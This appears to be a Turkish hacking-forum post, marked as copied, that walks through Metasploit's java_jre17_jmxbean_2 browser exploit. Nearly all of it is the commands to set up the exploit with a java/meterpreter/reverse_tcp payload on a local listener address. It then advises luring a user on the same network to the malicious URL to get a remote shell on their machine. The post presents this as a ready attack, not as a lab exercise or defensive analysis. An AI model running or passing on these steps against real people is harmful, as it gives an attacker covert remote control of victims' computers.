View hidden content is available for registered users!
metasploit açalım ve şu kodu yazalım
use exploit/multi/browser/java_jre17_jmxbean_2
exploit hakkında bilgi edinmek isterseniz info diyip exploit hakkında bilgi edinebilirsiniz
bu exploit Java 6 yüklü bir hedefte çalışmayacaktır
Burdaki değer 8080 yani exploiti çalıştırcağımızda 8080 portu üzerinden bağlantı geldiğinde payload'ımız aktifleşcek
set srvport 80 ile srvport'a 80 değerini atıyoruz.
set uripath
Exploitimize uygun payload'ları listelemek için show payloads deyimini kullanırız
set payload java/meterpreter/reverse_tcp
set lhost 192.168.142.133 deyimi ile lhost'a 192.168.142.133 değerini atadık.
hedef sistemin ıp adresini yazınız.
show options ile ayarlarımıza tekrar baktığımızda yukardaki gibi değerin atandığını görebilirsiniz.
exploit
exploit deyimi ile exploit hazır hale getirilir.Yukardaki gibi exploitimizi hazırladık ve çalıştırdık.
4444 numaralı ip adresini dinlemeye aldık(msf kendi aldı bazı exploitlerde almaz siz kendiniz dinlemeye alırsınız.)Local IP kısmının karşısında yer alan değer yani;
http://192.168.142.133:80/ adresine aynı ağımızda bulunan kullanıcıyı yönlendirdiğimizde payloadımız üzerinden bağlantıları alacağız.
ALINTIDIR
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl